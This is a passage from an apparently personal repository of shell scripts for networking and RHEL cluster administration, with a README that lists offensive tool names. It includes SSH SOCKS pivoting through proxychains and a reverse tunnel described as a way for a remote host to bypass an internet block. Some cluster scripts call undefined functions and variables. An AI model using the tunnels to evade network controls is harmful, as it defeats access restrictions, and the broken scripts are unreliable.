inet) 70 | fi 71 | done 72 | fi 73 | -------------------------------------------------------------------------------- /Networking/get_nics_with_ip_mac_status_freebsd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: get_nics_with_ip_mac_status_freebsd.sh 6 | # 7 | # Description: A script that returns a list of all the NICs with their IP and 8 | # MAC addresses plus their status. Works on FreeBSD only. 9 | # 10 | # Usage: ./get_nics_with_ip_mac_status_freebsd.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # FUNCTIONS -------------------------------------------------------------------- 21 | 22 | command_exists() { 23 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! 
Command not found: $1" 1>&2 ; exit 1 ; } 24 | } 25 | 26 | display_usage() { 27 | echo "Usage: $0" 28 | } 29 | 30 | 31 | # CHECKS ----------------------------------------------------------------------- 32 | 33 | declare -a CMDS=( 34 | "ifconfig" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | 42 | # MAIN ------------------------------------------------------------------------- 43 | 44 | if [[ $# -ne 0 ]] ; then 45 | display_usage 46 | 47 | exit 1 48 | else 49 | echo 50 | echo "Interface | MAC address | IP address | Status" 51 | echo "----------+----------------------+----------------------+-----------" 52 | 53 | for IF in $(ifconfig -l) ; do 54 | MA=$(ifconfig $IF | grep -w ether | awk '{print $2}') 55 | IP=$(ifconfig $IF | grep -w inet | awk '{print $2}') 56 | ST=$(ifconfig $IF | grep -w status | cut -d':' -f2) 57 | 58 | printf "%-9s | %-20s | %-20s |%-20s" "$IF" "$MA" "$IP" "$ST" 59 | echo 60 | done 61 | 62 | echo 63 | fi 64 | -------------------------------------------------------------------------------- /Networking/list_public_open_ports.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: list_public_open_ports.sh 6 | # 7 | # Description: This script lists all the listening processes that expose one or 8 | # more open ports on a server's public IP. All those open ports 9 | # may represent a potential attack surface. 10 | # It uses "sockstat" and has been tested on FreeBSD only. 11 | # 12 | # Usage: ./list_public_open_ports.sh 13 | # 14 | # 15 | # --TODO-- 16 | # - ??? 17 | # 18 | # 19 | ################################################################################ 20 | 21 | 22 | # FUNCTIONS -------------------------------------------------------------------- 23 | 24 | command_exists() { 25 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 26 | } 27 | 28 | 29 | # CHECKS ----------------------------------------------------------------------- 30 | 31 | declare -a CMDS=( 32 | "column" 33 | "curl" 34 | "sockstat" 35 | ); 36 | 37 | for CMD in ${CMDS[@]} ; do 38 | command_exists $CMD 39 | done 40 | 41 | 42 | # MAIN ------------------------------------------------------------------------- 43 | 44 | IP=$(curl -s ifconfig.co) # get public IP address 45 | 46 | { 47 | echo "USER PROCESS PORT" 48 | echo "---- ------- ----" 49 | sockstat -4 -l | grep -e "\*:[0-9]" -e $IP | awk '{ print $1," ",$2," ",$6 }' | sed -e 's/*://g' | sed -e "s/$IP://g" | sort -u 50 | } | column -t -x 51 | 52 | -------------------------------------------------------------------------------- /Networking/ping_until_alive.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | if [[ $# -ne 1 ]] ; then 4 | echo "Usage: $0 " 5 | 6 | exit 1 7 | fi 8 | 9 | IP=$1 10 | 11 | D=$(date +"%a %d %h %Y at %T") 12 | echo "Starting monitoring on $D" 13 | echo -n "Pinging $IP " 14 | 15 | until ping -4 -D -c 1 -n -O -q -W 1 "$IP" > /dev/null 2>&1 ; do 16 | echo -n "." 
17 | sleep 1 18 | done 19 | 20 | D=$(date +"%a %d %h %Y at %T") 21 | echo -e "\nHost $IP came back alive on $D" 22 | -------------------------------------------------------------------------------- /Networking/reverse_ip_lookup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | IP=$1 4 | 5 | curl -k https://api.hackertarget.com/reverseiplookup/?q=$IP 6 | -------------------------------------------------------------------------------- /Networking/snippets.txt: -------------------------------------------------------------------------------- 1 | # sort a list of IPs in real numerical order 2 | cat ips.txt | sort -n -u -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 3 | 4 | 5 | 6 | # simple web server with Python3 7 | python3 -m http.server 8080 --bind 127.0.0.1 8 | 9 | 10 | 11 | # simple SMTP server with Python3 12 | python3 -m smtpd -c DebuggingServer -n localhost:8025 13 | 14 | 15 | 16 | # get Geo location of an IP address 17 | curl -s https://freegeoip.app/csv/8.8.8.8 18 | -------------------------------------------------------------------------------- /Networking/ssh_proxy_pivot.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: ssh_proxy_pivot.sh 6 | # 7 | # Description: A script that estabilishes a connection to a remote host and 8 | # uses it for SSH tunneling/pivoting via proxychains. 9 | # ProxyChains needs to be installed and configured. 10 | # 11 | # Here is a snippet from "/etc/proxychains.conf": 12 | # 13 | # ... 14 | # [ProxyList] 15 | # #socks4 127.0.0.1 9050 16 | # socks4 127.0.0.1 12345 17 | # ... 18 | # 19 | # Usage: ./ssh_proxy_pivot.sh <[user@]target> 20 | # 21 | # 22 | # --TODO-- 23 | # - ??? 24 | # 25 | # 26 | ################################################################################ 27 | 28 | 29 | # VARIABLES -------------------------------------------------------------------- 30 | 31 | LOCAL_HOST="127.0.0.1" 32 | LOCAL_PORT=$(cat /etc/proxychains.conf | grep -v ^# | grep ^socks4 | grep ${LOCAL_HOST} | awk '{print $3}') 33 | USER_AND_TARGET=$1 34 | 35 | 36 | # FUNCTIONS -------------------------------------------------------------------- 37 | 38 | command_exists() { 39 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 40 | } 41 | 42 | 43 | # CHECKS ----------------------------------------------------------------------- 44 | 45 | declare -a CMDS=( 46 | "netstat" 47 | "ssh" 48 | ); 49 | 50 | for CMD in ${CMDS[@]} ; do 51 | command_exists $CMD 52 | done 53 | 54 | if [[ "$#" -ne 1 ]] ; then 55 | echo "Usage: ./ssh_proxy_pivot.sh <[user@]target>" 56 | 57 | exit 1 58 | fi 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | ssh -4 -f -N -D ${LOCAL_PORT} ${USER_AND_TARGET} 64 | 65 | echo "Listening on port ${LOCAL_PORT} on host ${LOCAL_HOST}..." 66 | 67 | netstat -tunlp 2> /dev/null | grep -v tcp6 | grep tcp | grep --color=never ":${LOCAL_PORT} " | tail -1 68 | 69 | # now proceed with (e.g.): 70 | # 71 | # proxychains rdesktop 72 | # proxychains google-chrome http:// 73 | # ... 
74 | -------------------------------------------------------------------------------- /Networking/ssh_socks5_proxy_remote_host.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: ssh_socks5_proxy_remote_host.sh 6 | # 7 | # Description: A script that makes localhost act as a SOCKS5 server, then opens 8 | # a remote port (eg: 3128) on a remote machine so that it can pass 9 | # all the Internet traffic through the SSH tunnel. This is useful 10 | # when the remote machine can not reach the Internet, but you can 11 | # connect to it via SSH, so that you can let the remote machine 12 | # bypass the block. 13 | # 14 | # Here is a snippet from "/etc/proxychains.conf" on the remote 15 | # machine: 16 | # 17 | # ... 18 | # [ProxyList] 19 | # socks5 127.0.0.1 3128 20 | # ... 21 | # 22 | # Usage: ./ssh_socks5_proxy_remote_host.sh <[user@]target> 23 | # 24 | # 25 | # --TODO-- 26 | # - ??? 27 | # 28 | # 29 | ################################################################################ 30 | 31 | 32 | # VARIABLES -------------------------------------------------------------------- 33 | 34 | LOCAL_HOST="127.0.0.1" 35 | LOCAL_PORT=3128 36 | REMOTE_PORT=$LOCAL_PORT 37 | USER_AND_TARGET=$1 38 | 39 | 40 | # FUNCTIONS -------------------------------------------------------------------- 41 | 42 | command_exists() { 43 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 44 | } 45 | 46 | 47 | # CHECKS ----------------------------------------------------------------------- 48 | 49 | declare -a CMDS=( 50 | "ssh" 51 | ); 52 | 53 | for CMD in ${CMDS[@]} ; do 54 | command_exists $CMD 55 | done 56 | 57 | if [[ "$#" -ne 1 ]] ; then 58 | echo "Usage: ./ssh_socks5_proxy_remote_host.sh <[user@]target>" 59 | 60 | exit 1 61 | fi 62 | 63 | 64 | # MAIN ------------------------------------------------------------------------- 65 | 66 | ssh -f -N -D ${LOCAL_PORT} localhost 67 | ssh -R ${REMOTE_PORT}:localhost:${LOCAL_PORT} ${USER_AND_TARGET} 68 | 69 | # now, on the remote host, proceed with (e.g.): 70 | # 71 | # proxychains curl icanhazip.com 72 | # ... 73 | # 74 | # 75 | # 76 | # to use APT via "local" SOCKS5 proxy, create file "/etc/apt/apt.conf.d/12proxy" 77 | # with fhe following contents (e.g.: with REMOTE_PORT = 3128): 78 | # 79 | # Acquire::http::proxy "socks5h://127.0.0.1:3128"; 80 | # Acquire::https::proxy "socks5h://127.0.0.1:3128"; 81 | 82 | -------------------------------------------------------------------------------- /Networking/tor_check.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: tor_check.sh 6 | # 7 | # Description: A script that checks for Tor connectivity via command line. 8 | # 9 | # Usage: ./tor_check.sh 10 | # 11 | # 12 | # --TODO-- 13 | # - ??? 
14 | # 15 | # 16 | ################################################################################ 17 | 18 | 19 | # VARIABLES -------------------------------------------------------------------- 20 | 21 | HOST=localhost 22 | PORT=9050 23 | CHECK_SITE="https://check.torproject.org/" 24 | EXIT_NODE="http://checkip.amazonaws.com/" 25 | #EXIT_NODE="http://ipecho.net/plain" 26 | 27 | 28 | # FUNCTIONS -------------------------------------------------------------------- 29 | 30 | command_exists() { 31 | command -v "$1" >/dev/null 2>&1 || { echo "ERROR! Command not found: $1" 1>&2 ; exit 1 ; } 32 | } 33 | 34 | 35 | # CHECKS ----------------------------------------------------------------------- 36 | 37 | declare -a CMDS=( 38 | "curl" 39 | "netstat" 40 | ); 41 | 42 | for CMD in ${CMDS[@]} ; do 43 | command_exists $CMD 44 | done 45 | 46 | 47 | # MAIN ------------------------------------------------------------------------- 48 | 49 | TOR_STRING=$(netstat -plantue | grep LISTEN | grep ${PORT}) 50 | 51 | if [[ -z "${TOR_STRING}" ]] ; then 52 | echo "Tor service doesn't seem to be running (since nothing is listening on port ${PORT})..." 53 | else 54 | curl --socks5 ${HOST}:${PORT} --socks5-hostname ${HOST}:${PORT} -s ${CHECK_SITE} | cat | grep -m 1 Congratulations | xargs 55 | 56 | EXIT_NODE_IP=$(curl --socks5-hostname ${HOST}:${PORT} -s ${EXIT_NODE}) 57 | 58 | echo "Tor seems to be up! Your current exit node's IP is: ${EXIT_NODE_IP}" 59 | fi 60 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Scripts 2 | A collection of personal useful scripts (in Bash and Python) for Unix and GNU/Linux systems. 3 | ``` 4 | ./Databases/mysql_trace_changes_example.sql 5 | ./Graphical_Environments/firefox_history_stats.sh 6 | ./Graphical_Environments/record_screen.sh 7 | ./Graphical_Environments/set_gnome-shell_theme.sh 8 | ./Hacking/Info_Gathering/nmap_amap_identify.sh 9 | ./Hacking/Info_Gathering/nmap_deep.sh 10 | ./Hacking/Info_Gathering/nmap_html_report.sh 11 | ./Hacking/Info_Gathering/nmap_light.sh 12 | ./Hacking/Info_Gathering/nmap_with_tor.sh 13 | ./Hacking/Info_Gathering/zmap_screenshot.sh 14 | ./Hacking/Misc/dirtycow_centos.sh 15 | ./Hacking/Misc/S3obd.py 16 | ./Hacking/Password_Cracking/autojohn.sh 17 | ./Hacking/Password_Cracking/dict_split_n_sort.sh 18 | ./Hacking/Password_Cracking/htmltable2csv.py 19 | ./Hacking/Password_Cracking/pwd_sucker_crackpot.sh 20 | ./Hacking/Password_Cracking/pwd_sucker_gromweb.sh 21 | ./Hacking/Password_Cracking/pwd_sucker_hashkiller.sh 22 | ./Hacking/Password_Cracking/pwd_sucker_md5db.sh 23 | ./Hacking/Penetration_Testing/find_reflected_xss.sh 24 | ./Hacking/Penetration_Testing/sniff_host_traffic.sh 25 | ./Hacking/Penetration_Testing/sniff_passwords_tcpdump.sh 26 | ./Hacking/Penetration_Testing/sniff_ssh_credentials.sh 27 | ./Hacking/snippets.txt 28 | ./Media/image_orientation.sh 29 | ./Media/snippets.txt 30 | ./Networking/get_nics_with_ip_mac_status_freebsd.sh 31 | ./Networking/get_nics_with_ip_mac_status.sh 32 | ./Networking/list_public_open_ports.sh 33 | ./Networking/ping_until_alive.sh 34 | ./Networking/reverse_ip_lookup.sh 35 | ./Networking/snippets.txt 36 | ./Networking/ssh_proxy_pivot.sh 37 | ./Networking/ssh_socks5_proxy_remote_host.sh 38 | ./Networking/tor_check.sh 39 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_info.sh 40 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_logs.sh 41 | 
./System_Administration/Clusters/RedHat_HA_Cluster/cluster_rrp_tcpdump.sh 42 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_running_resource_groups.sh 43 | ./System_Administration/Clusters/RedHat_HA_Cluster/cluster_status.sh 44 | ./System_Administration/Clusters/RedHat_HA_Cluster/prompt.sh 45 | ./System_Administration/fix_locales.sh 46 | ./System_Administration/mount_smb_shares_with_auth.sh 47 | ./System_Administration/pip_upgrade_pkgs.sh 48 | ./System_Administration/prepare_kali.sh 49 | ./System_Administration/quick_backup.sh 50 | ./System_Administration/snippets.txt 51 | ./System_Administration/Virtualization/proxmox_import_ova.sh 52 | ./Utilities/free_buffer_cache.sh 53 | ./Utilities/git_list_repos.sh 54 | ./Utilities/git_update_repos.sh 55 | ./Utilities/greenpass_qr_decoder.sh 56 | ./Utilities/magnet2torrent.sh 57 | ./Utilities/mysql2csv.sh 58 | ./Utilities/nessus_massive_export.sh 59 | ./Utilities/NessusToExcel.py 60 | ./Utilities/send_sms.sh 61 | ./Utilities/share_dir_via_rdp.sh 62 | ./Utilities/shrinkpdf.sh 63 | ./Utilities/snippets.txt 64 | ./Utilities/xfce4-root-terminal.sh 65 | ./Web/extract_links.sh 66 | ./Web/share_file.sh 67 | ./Web/SharePwd.py 68 | ``` 69 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_info.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_info.sh 6 | # 7 | # Description: A script that shows some information about running resources in 8 | # resource groups on a RHEL 7 cluster. 9 | # 10 | # Usage: ./cluster_info.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | WIDTH=18 23 | 24 | 25 | # FUNCTIONS -------------------------------------------------------------------- 26 | 27 | command_exists () { 28 | command -v "$1" >/dev/null 2>&1 || { echo "Command not found: $1" >&2 ; exit 1 ; } 29 | } 30 | 31 | 32 | # CHECKS ----------------------------------------------------------------------- 33 | 34 | if [[ $EUID -ne 0 ]] ; then 35 | echo "This script must be run as root!" 
1>&2 36 | exit 1 37 | fi 38 | 39 | declare -a CMDS=( 40 | "crmadmin" 41 | "pcs" 42 | ); 43 | 44 | for CMD in ${CMDS[@]} ; do 45 | command_exists $CMD 46 | done 47 | 48 | 49 | # MAIN ------------------------------------------------------------------------- 50 | 51 | printf "%-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %-${WIDTH}s\n" GROUP RESOURCE TYPE NODE 52 | echo "--------------------------------------------------------------------------------" 53 | 54 | DESIGNATED_CONTROLLER=$(crmadmin -D | grep "Designated Controller" | awk 'END {print $NF}') 55 | 56 | while read -r GROUPS_AND_RESOURCES ; do 57 | GROUP_AND_RESOURCES=($GROUPS_AND_RESOURCES) 58 | GROUP=${GROUP_AND_RESOURCES[0]} 59 | RESOURCES=${GROUP_AND_RESOURCES[@]:1} 60 | 61 | for RESOURCE in $RESOURCES ; do 62 | TYPE=$(pcs resource show $RESOURCE | grep Resource | sed -e 's/)//g') 63 | TYPE=${TYPE##*=} 64 | NODE=$(pcs status resources | grep $RESOURCE | awk 'END {print $NF}') 65 | 66 | if [ -n "$DESIGNATED_CONTROLLER" ] && [ "$DESIGNATED_CONTROLLER" = "$NODE" ] ; then 67 | NODE="$NODE (DC)" 68 | fi 69 | 70 | printf "%-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %-${WIDTH}s %s\n" $GROUP $RESOURCE $TYPE $NODE 71 | done 72 | done < <(pcs status groups | sed -e 's/://g') 73 | 74 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_logs.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_logs.sh 6 | # 7 | # Description: A script that shows all the logs of a RHEL 7 cluster (corosync, 8 | # pacemaker and pcsd). 9 | # 10 | # Usage: ./cluster_logs.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | LOGDIR=/var/log 23 | COROSYNC_LOGFILE=$LOGDIR/cluster/corosync.log 24 | PACEMAKER_LOGFILE=$LOGDIR/pacemaker.log 25 | PCSD_LOGFILE=$LOGDIR/pcsd/pcsd.log 26 | 27 | 28 | # MAIN ------------------------------------------------------------------------- 29 | 30 | tail -F $COROSYNC_LOGFILE $PACEMAKER_LOGFILE $PCSD_LOGFILE & 31 | 32 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_rrp_tcpdump.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_rrp_tcpdump.sh 6 | # 7 | # Description: A script that uses tcpdump to show the packets used by Corosync 8 | # for RRP (with some fancy colors). 9 | # 10 | # Usage: ./cluster_rrp_tcpdump.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 
15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | # NIC and multicast port for RING 0 23 | NIC_RING0=eth0 24 | PORT_RING0=5405 25 | # NIC and multicast port for RING 1 26 | NIC_RING1=eth1 27 | PORT_RING1=5407 28 | 29 | # ANSI colors 30 | # http://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux 31 | # http://misc.flogisoft.com/bash/tip_colors_and_formatting 32 | _RED_=$(tput setaf 1) 33 | _GREEN_=$(tput setaf 2) 34 | _YELLOW_=$(tput setaf 3) 35 | _BLUE_=$(tput setaf 4) 36 | _MAGENTA_=$(tput setaf 5) 37 | _CYAN_=$(tput setaf 6) 38 | _RESET_=$(tput sgr0) 39 | 40 | 41 | # CHECKS ----------------------------------------------------------------------- 42 | 43 | if [[ $EUID -ne 0 ]] ; then 44 | echo "This script must be run as root!" 1>&2 45 | exit 1 46 | fi 47 | 48 | declare -a CMDS=( 49 | "tcpdump" 50 | ); 51 | 52 | for CMD in ${CMDS[@]} ; do 53 | command_exists $CMD 54 | done 55 | 56 | 57 | # MAIN ------------------------------------------------------------------------- 58 | 59 | IP_RING0=$(ifconfig $NIC_RING0 | grep inet | awk '{print $2}') 60 | IP_RING0_COLOR=${_GREEN_}$IP_RING0${_RESET_} 61 | PORT_RING0_COLOR=${_YELLOW_}$PORT_RING0${_RESET_} 62 | 63 | IP_RING1=$(ifconfig $NIC_RING1 | grep inet | awk '{print $2}') 64 | IP_RING1_COLOR=${_CYAN_}$IP_RING1${_RESET_} 65 | PORT_RING1_COLOR=${_MAGENTA_}$PORT_RING1${_RESET_} 66 | 67 | $TCPDUMP_COMMAND -i any "((host $IP_RING0 and port $PORT_RING0) or (host $IP_RING1 and port $PORT_RING1))" -nn -l | sed -e "s/$IP_RING0/$IP_RING0_COLOR/g;s/$PORT_RING0/$PORT_RING0_COLOR/g;s/$IP_RING1/$IP_RING1_COLOR/g;s/$PORT_RING1/$PORT_RING1_COLOR/g" 68 | 69 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_running_resource_groups.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_running_resource_groups.sh 6 | # 7 | # Description: A script that shows on which nodes all the resource groups are 8 | # running. 9 | # 10 | # Usage: ./cluster_running_resource_groups.sh 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | WIDTH=18 23 | 24 | 25 | # CHECKS ----------------------------------------------------------------------- 26 | 27 | if [[ $EUID -ne 0 ]] ; then 28 | echo "This script must be run as root!" 
1>&2 29 | exit 1 30 | fi 31 | 32 | declare -a CMDS=( 33 | "crm_resource" 34 | ); 35 | 36 | for CMD in ${CMDS[@]} ; do 37 | command_exists $CMD 38 | done 39 | 40 | 41 | # MAIN ------------------------------------------------------------------------- 42 | 43 | while read -r RESOURCE_GROUP 44 | do 45 | NODE=$($CRM_RESOURCE_COMMAND --resource $RESOURCE_GROUP --locate | awk '{print $NF}') 46 | 47 | printf "%-${WIDTH}s %-${WIDTH}s\n" $RESOURCE_GROUP $NODE 48 | done < <($CRM_RESOURCE_COMMAND --list | grep 'Resource Group' | awk '{print $NF}' | sort) 49 | 50 | -------------------------------------------------------------------------------- /System_Administration/Clusters/RedHat_HA_Cluster/cluster_status.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | # 3 | # Author: Riccardo Mollo (riccardomollo84@gmail.com) 4 | # 5 | # Name: cluster_running_resource_groups.sh 6 | # 7 | # Description: A script that shows the status of the whole running cluster 8 | # (with some fancy colors). 9 | # 10 | # Usage: ./cluster_status.sh [] 11 | # 12 | # 13 | # --TODO-- 14 | # - ??? 15 | # 16 | # 17 | ################################################################################ 18 | 19 | 20 | # VARIABLES -------------------------------------------------------------------- 21 | 22 | # ANSI colors 23 | # http://stackoverflow.com/questions/5947742/how-to-change-the-output-color-of-echo-in-linux 24 | # http://misc.flogisoft.com/bash/tip_colors_and_formatting 25 | _RED_=$(tput setaf 1) 26 | _GREEN_=$(tput setaf 2) 27 | _YELLOW_=$(tput setaf 3) 28 | _BLUE_=$(tput setaf 4) 29 | _MAGENTA_=$(tput setaf 5) 30 | _CYAN_=$(tput setaf 6) 31 | _RESET_=$(tput sgr0) 32 | 33 | 34 | # CHECKS ----------------------------------------------------------------------- 35 | 36 | if [[ $# -ge 2 ]] ; then 37 | echo "[ERROR] Wrong number of parameters." 38 | exit 1 39 | fi 40 | 41 | if [[ $EUID -ne 0 ]] ; then 42 | echo "This script must be run as root!" 
1>&2 43 | exit 1 44 | fi 45 | 46 | declare -a CMDS=( 47 | "pcs" 48 | "crm_mon" 49 | "crm_node" 50 | "crm_resource" 51 | "crmadmin" 52 | "corosync-cfgtool" 53 | "corosync-quorumtool" 54 | ); 55 | 56 | for CMD in ${CMDS[@]} ; do 57 | command_exists $CMD 58 | done 59 | 60 | 61 | # MAIN ------------------------------------------------------------------------- 62 | 63 | RGS=false 64 | 65 | if [[ $# -eq 1 ]] ; then 66 | RGS=true 67 | fi 68 | 69 | HOSTNAME=$(hostname -s) 70 | CLUSTER_NAME=$(pcs property | grep cluster-name | cut -d ':' -f 2-) 71 | CLUSTER_NAME=$(echo $CLUSTER_NAME) 72 | 73 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 74 | echo "${_CYAN_}$CLUSTER_NAME - CLUSTER / LAN STATUS${_RESET_}" 75 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 76 | 77 | while read -r RINGS_STATUS_ROW ; do 78 | if [[ $RINGS_STATUS_ROW =~ "FAULTY" ]] ; then 79 | TMP_FAULTY="${_RED_}FAULTY${_RESET_}" 80 | RINGS_STATUS_ROW=${RINGS_STATUS_ROW/FAULTY/$TMP_FAULTY} 81 | fi 82 | 83 | echo $RINGS_STATUS_ROW 84 | done < <(corosync-cfgtool -s | grep status | grep '=' | cut -d '=' -f 2) 85 | echo 86 | 87 | corosync-quorumtool -s | grep -e "Quorum provider\|Nodes\|Quorate" 88 | 89 | N_OF_GROUPS=$(crm_resource -L | grep 'Resource Group'| wc -l) 90 | N_OF_RESOURCES=$(crm_resource -L | grep -v 'Resource Group'| wc -l) 91 | 92 | echo 93 | echo "Resource Groups: $N_OF_GROUPS" 94 | echo "Resources: $N_OF_RESOURCES" 95 | 96 | echo 97 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 98 | echo "${_CYAN_}$CLUSTER_NAME - NODES STATUS${_RESET_}" 99 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 100 | 101 | printf "%-20s%-12s%-12s%-20s\n" NODE RESOURCES COROSYNC PACEMAKER 102 | 103 | COROSYNC_ONLINE_NODES=$(pcs status nodes both | tail -n +"2" | head -n "$((4 - 2))" | grep 'Online:' | sed -e 's/\ Online:\ //g') 104 | COROSYNC_OFFLINE_NODES=$(pcs status nodes both | tail -n +"2" | head -n "$((4 - 2))" | grep 'Offline:' | sed -e 's/\ Offline:\ //g') 105 | PACEMAKER_ONLINE_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Online:' | sed -e 's/\ Online:\ //g') 106 | PACEMAKER_STANDBY_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Standby:' | sed -e 's/\ Standby:\ //g') 107 | PACEMAKER_OFFLINE_NODES=$(pcs status nodes both | tail -n +"5" | head -n "$((8 - 5))" | grep 'Offline:' | sed -e 's/\ Offline:\ //g') 108 | 109 | for NODE in $(crm_node --list | awk '{ print $2 }') ; do 110 | COROSYNC_NODE_STATUS="" 111 | 112 | if [[ $COROSYNC_ONLINE_NODES =~ $NODE ]] ; then 113 | COROSYNC_NODE_STATUS="${_GREEN_}ONLINE${_RESET_}" 114 | elif [[ $COROSYNC_OFFLINE_NODES =~ $NODE ]] ; then 115 | COROSYNC_NODE_STATUS="${_RED_}OFFLINE${_RESET_}" 116 | fi 117 | 118 | PACEMAKER_NODE_STATUS="" 119 | 120 | if [[ $PACEMAKER_ONLINE_NODES =~ $NODE ]] ; then 121 | PACEMAKER_NODE_STATUS="${_GREEN_}ONLINE${_RESET_}" 122 | elif [[ $PACEMAKER_STANDBY_NODES =~ $NODE ]] ; then 123 | PACEMAKER_NODE_STATUS="${_YELLOW_}STANDBY${_RESET_}" 124 | elif [[ $PACEMAKER_OFFLINE_NODES =~ $NODE ]] ; then 125 | PACEMAKER_NODE_STATUS="${_RED_}OFFLINE${_RESET_}" 126 | fi 127 | 128 | RESOURCES=$(crm_mon -1 -n -b -D | awk '/^Node/{n=$2;next}{t[n]+=$1}END{for(n in t){print n,t[n]}}' | grep $NODE | awk '{print $2}') 129 | 130 | if [[ -z $RESOURCES ]] ; then 131 | RESOURCES="-" 132 | fi 133 | 
134 | if [[ $NODE == $HOSTNAME ]] ; then 135 | NODE="${NODE}<" 136 | fi 137 | 138 | printf "%-20s%-12s%-23s%-20s\n" $NODE $RESOURCES $COROSYNC_NODE_STATUS $PACEMAKER_NODE_STATUS 139 | done 140 | 141 | echo 142 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 143 | echo "${_CYAN_}$CLUSTER_NAME - FENCING STATUS${_RESET_}" 144 | echo "${_CYAN_}--------------------------------------------------------------------------------${_RESET_}" 145 | 146 | FENCING_ACTIVE=$(pcs stonith show --full | head -1) 147 | 148 | if [[ $FENCING_ACTIVE != "" ]] ; then 149 | printf "%-20s%-12s%-20s%-10s\n" RESOURCE STATUS 'RUNNING ON NODE' TYPE 150 | 151 | while read -r FENCING_RESOURCE ; do 152 | RUNNING_ON_NODE="" 153 | FENCING_RESOURCE_NAME=$(echo $FENCING_RESOURCE | awk '{ print $1 }') 154 | FENCING_RESOURCE_STATUS=$(echo $FENCING_RESOURCE | awk '{ print $3 }') 155 | FENCING_RESOURCE_STATUS=${FENCING_RESOURCE_STATUS^^} 156 | FENCING_RESOURCE_TYPE=$(echo $FENCING_RESOURCE | awk '{ print $2 }' | cut -d':' -f 2 | tr ')' ' ') 157 | 158 | if [[ $FENCING_RESOURCE_STATUS == "STARTED" ]] ; then 159 | RUNNING_ON_NODE=$(crm_resource --resource $FENCING_RESOURCE --locate | awk '{print $NF}') 160 | FENCING_RESOURCE_STATUS="${_GREEN_}STARTED${_RESET_}" 161 | elif [[ $FENCING_RESOURCE_STATUS == "STOPPED" ]] ; then 162 | RUNNING_ON_NODE="-" 163 | FENCING_RESOURCE_STATUS="${_RED_}STOPPED${_RESET_}" 164 | fi 165 | 166 | if [[ $RUNNING_ON_NODE == $HOSTNAME ]] ; then 167 | RUNNING_ON_NODE="${RUNNING_ON_NODE}<" 168 | fi 169 | 170 | printf "%-20s%-23s%-20s%-17s\n" $FENCING_RESOURCE_NAME 